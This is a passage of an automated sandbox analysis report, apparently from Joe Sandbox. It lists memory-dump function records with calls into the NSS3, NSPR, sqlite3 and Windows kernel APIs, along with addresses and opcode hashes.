  • Part of subcall function 6C4C4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C4C4EB8,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C486D
  • Part of subcall function 6C4C4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C4C4EB8,?), ref: 6C4C4884
• SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4EC0
  • Part of subcall function 6C4C4470: TlsGetValue.KERNEL32(00000000,?,6C487296,00000000), ref: 6C4C4487
  • Part of subcall function 6C4C4470: EnterCriticalSection.KERNEL32(?,?,?,6C487296,00000000), ref: 6C4C44A0
  • Part of subcall function 6C4C4470: PR_Unlock.NSS3(?,?,?,?,6C487296,00000000), ref: 6C4C44BB
• TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F16
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F2E
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F40
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F6C
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F80
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F8F
                                                                                                                                                                                                                          • PK11_UpdateSlotAttribute.NSS3(?,6C59DCB0,00000000), ref: 6C4C4FFE
                                                                                                                                                                                                                          • PK11_UserDisableSlot.NSS3(0000001E), ref: 6C4C501F
                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C506B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                           • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 560490210-0
                                                                                                                                                                                                                          • Opcode ID: c64f7c710ce87e8d176b0a701da8deeebb42678f96b8a54836d2cad010331643
                                                                                                                                                                                                                          • Instruction ID: fec6ad715783ffef66338e84313217c14c5c2cfc5b80a54873538c41b8c1c695
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c64f7c710ce87e8d176b0a701da8deeebb42678f96b8a54836d2cad010331643
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA5103B9E002019BEB01DF25EC01EAA76B4EF0535EF150138EC0696B21FB31E915CAE7
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                           • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 786543732-0
                                                                                                                                                                                                                          • Opcode ID: 4cb28613af993ede68c4c457c8409bf42864b8e0f06decce65a4ab1284eab00f
                                                                                                                                                                                                                          • Instruction ID: e4136dce846dc07b2b1b628d8241d503ebaf67a9ddac1e82fb0142ab584fcff0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cb28613af993ede68c4c457c8409bf42864b8e0f06decce65a4ab1284eab00f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6519AB0A41A259BDF00DF9ADC45EAE77B5EF06359F050029E805A7F00D331BA45CBEA
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_value_text16.NSS3(?), ref: 6C544CAF
                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C544CFD
                                                                                                                                                                                                                          • sqlite3_value_text16.NSS3(?), ref: 6C544D44
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                           • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                                          • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                                          • API String ID: 2274617401-4033235608
                                                                                                                                                                                                                          • Opcode ID: 6616b7fd87b92775a9e3805ba21952d50fe098e7fd2d1a2228ebbce1734ed3cb
                                                                                                                                                                                                                          • Instruction ID: abdb078b6f1cb5ac802598a5a5fa0d5719041f84daac4afad17d0cb2abfc312a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6616b7fd87b92775a9e3805ba21952d50fe098e7fd2d1a2228ebbce1734ed3cb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78319973EC4951A7E7088E24AC01BA973617792318F1AC529D8246BE58DF71AC5283E2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C542D9F
                                                                                                                                                                                                                            • Part of subcall function 6C3FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C45F9C9,?,6C45F4DA,6C45F9C9,?,?,6C42369A), ref: 6C3FCA7A
                                                                                                                                                                                                                            • Part of subcall function 6C3FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C3FCB26
                                                                                                                                                                                                                          • sqlite3_exec.NSS3(?,?,6C542F70,?,?), ref: 6C542DF9
                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C542E2C
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C542E3A
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C542E52
                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(6C5AAAF9,?), ref: 6C542E62
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C542E70
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C542E89
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C542EBB
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C542ECB
                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C542F3E
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C542F4C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                           • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                           • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1957633107-0
                                                                                                                                                                                                                          • Opcode ID: 271e1b058088762db63921a3c4da6a44167d0bb3780bcfb92f7a3c8769ab178d
                                                                                                                                                                                                                          • Instruction ID: 2d4ba5462b342d39908cd4c385044ac24f691e5486a6b83711685dc5f1761bec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 271e1b058088762db63921a3c4da6a44167d0bb3780bcfb92f7a3c8769ab178d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4619FB5E002159BEB00CFA8DC85BAEB7B1AF58348F158428DC55E7701E735E856CFA1
APIs
• PR_CallOnce.NSS3(6C5D2120,Function_00097E60,00000000,?,?,?,?,6C50067D,6C501C60,00000000), ref: 6C487C81
  • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
  • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
  • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
• TlsGetValue.KERNEL32 ref: 6C487CA0
• EnterCriticalSection.KERNEL32(?), ref: 6C487CB4
• PR_Unlock.NSS3 ref: 6C487CCF
  • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
  • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
• TlsGetValue.KERNEL32 ref: 6C487D04
• EnterCriticalSection.KERNEL32(?), ref: 6C487D1B
• realloc.MOZGLUE(-00000050), ref: 6C487D82
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C487DF4
• PR_Unlock.NSS3 ref: 6C487E0E
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
• String ID:
• API String ID: 2305085145-0
• Opcode ID: 69a72416769dc8239274cb2043758183e64b9b4e7dcff724383aa8ce74fd24d0
• Instruction ID: 5463acb8560592967cb40a37d0c4bf664bf96c12b4e201e520948492ddfff933
• Opcode Fuzzy Hash: 69a72416769dc8239274cb2043758183e64b9b4e7dcff724383aa8ce74fd24d0
• Instruction Fuzzy Hash: 8651F575B0A200DBDB01EF68CC54E6577F5FB42319F168129FD0487B22EB30E851CA99
APIs
• SECOID_FindOID_Util.NSS3(?,?,?,6C4D91C5), ref: 6C4D788F
  • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
  • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
  • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
  • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
• PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4D91C5), ref: 6C4D78BB
• PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C4D91C5), ref: 6C4D78FA
• strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D7930
• PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D7951
• memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4D7964
• strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4D797A
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C4D7988
• memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C4D7998
• free.MOZGLUE(00000000), ref: 6C4D79A7
• SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D79BB
• PR_GetCurrentThread.NSS3(?,?,?,?,6C4D91C5), ref: 6C4D79CA
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$Error$Alloc_HashLookupTablememcpy$ConstCurrentFindItem_ThreadZfreefreestrchrstrcmpstrlen
• String ID:
• API String ID: 1862276529-0
• Opcode ID: 8fe294e77b7e5f8b582df8dd43d3464fd225205a1d73792af32ac44a99116ecf
• Instruction ID: 367f678168fe67a6680c86d7ad2236ae8eea98537c00b4dc20704b58f6d0490b
• Opcode Fuzzy Hash: 8fe294e77b7e5f8b582df8dd43d3464fd225205a1d73792af32ac44a99116ecf
• Instruction Fuzzy Hash: 7141E1B1A082019BFB10EB658C55F6B7BA8AF40249F260078F818D7B41E721F848C7E2
APIs
• TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
• EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
• PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
• TlsGetValue.KERNEL32(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D11
• EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D2A
• PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D4A
• PR_Unlock.NSS3(?,?,?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D57
• PR_GetCurrentThread.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D97
• PR_Lock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4DBA
• PR_WaitCondVar.NSS3 ref: 6C3F4DD4
• PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4DE6
• PR_GetCurrentThread.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4DEF
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
• String ID:
• API String ID: 3388019835-0
• Opcode ID: 0e179037cf5a98cdaf7d4df863126fc5dd625a27a64363bf515a41e093b4bd1e
• Instruction ID: 2052eeb9d1768aaaa765d0733675a89cc7dedcc86daed1b2f777d25f2ce6f245
• Opcode Fuzzy Hash: 0e179037cf5a98cdaf7d4df863126fc5dd625a27a64363bf515a41e093b4bd1e
• Instruction Fuzzy Hash: C94172B5A04725CFCB00AF78D984559B7B4BF05318F064A69E8589BB11E730E885CFD9
APIs
• PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FAF
• PR_Now.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FD1
• TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FFA
• EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499013
• PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499042
• TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C49905A
• EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499073
• PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C4990EC
  • Part of subcall function 6C460F00: PR_GetPageSize.NSS3(6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F1B
  • Part of subcall function 6C460F00: PR_NewLogModule.NSS3(clock,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F25
• PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499111
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
                                                                                                                                                                                                                          • String ID: nXl
                                                                                                                                                                                                                          • API String ID: 2831689957-2538165799
                                                                                                                                                                                                                          • Opcode ID: c8e3a92b7501b32e93f93e3b073d089d6788a780e64dc8d56a4a4931f53d352c
                                                                                                                                                                                                                          • Instruction ID: b8925d8819e3b706d61aeec6b41e1ca8f1732d4138f28589eb0e175b0598854e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8e3a92b7501b32e93f93e3b073d089d6788a780e64dc8d56a4a4931f53d352c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD517A74A046248FDF00EF78C888E59BBF0BF4A318F065569DC499BB05EB31E885CB95
APIs
• PR_GetCurrentThread.NSS3 ref: 6C587CE0
  • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C587D36
• PR_Realloc.NSS3(?,00000080), ref: 6C587D6D
• PR_GetCurrentThread.NSS3 ref: 6C587D8B
• PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6C587DC2
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C587DD8
• malloc.MOZGLUE(00000080), ref: 6C587DF8
• PR_GetCurrentThread.NSS3 ref: 6C587E06
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
• String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
• API String ID: 530461531-3274975309
• Opcode ID: d3050562fcd0ebb0cc78d85b1e7abb902b50b99e9c7d7125669b0829c451064f
• Instruction ID: f6354612a385c99da8c9a8ec2a00620b89f0394da6adc8833d0d5b9781249cd5
• Opcode Fuzzy Hash: d3050562fcd0ebb0cc78d85b1e7abb902b50b99e9c7d7125669b0829c451064f
• Instruction Fuzzy Hash: 4241C3B1A022119FDB04CF29CC80D6A37B6FF84358B29496CF81A8BB51D731ED01CBA1
APIs
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C587E37
• PR_GetEnvSecure.NSS3(NSPR_INHERIT_FDS), ref: 6C587E46
  • Part of subcall function 6C461240: TlsGetValue.KERNEL32(00000040,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461267
  • Part of subcall function 6C461240: EnterCriticalSection.KERNEL32(?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C46127C
  • Part of subcall function 6C461240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461291
  • Part of subcall function 6C461240: PR_Unlock.NSS3(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C4612A0
• PR_sscanf.NSS3(00000001,%d:0x%lx,?,?), ref: 6C587EAF
• PR_ImportFile.NSS3(?), ref: 6C587ECF
• PR_GetCurrentThread.NSS3 ref: 6C587ED6
• PR_ImportTCPSocket.NSS3(?), ref: 6C587F01
• PR_ImportUDPSocket.NSS3(?,?), ref: 6C587F0B
• PR_ImportPipe.NSS3(?,?,?), ref: 6C587F15
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Import$Socket$CriticalCurrentEnterFilePipeR_sscanfSectionSecureThreadUnlockValuegetenvstrlen
• String ID: %d:0x%lx$NSPR_INHERIT_FDS
• API String ID: 2743735569-629032437
• Opcode ID: eda0c8cf40778648ae3510c23005af5d62f38d23fcf83ccc6233bd39a0db5c4b
• Instruction ID: dfebf59d2f48e88393d07e76bbcf7c94d7337ba7d5f12e8ba59f03f43e99b080
• Opcode Fuzzy Hash: eda0c8cf40778648ae3510c23005af5d62f38d23fcf83ccc6233bd39a0db5c4b
• Instruction Fuzzy Hash: CF31E171B05125DBEB00DF79CC40AABBBA9AB46388F200965F855A7B11E7719D04CBA2
APIs
• TlsGetValue.KERNEL32 ref: 6C494E90
• EnterCriticalSection.KERNEL32 ref: 6C494EA9
• TlsGetValue.KERNEL32 ref: 6C494EC6
• EnterCriticalSection.KERNEL32 ref: 6C494EDF
• PL_HashTableLookup.NSS3 ref: 6C494EF8
• PR_Unlock.NSS3 ref: 6C494F05
• PR_Now.NSS3 ref: 6C494F13
• PR_Unlock.NSS3 ref: 6C494F3A
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
  • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
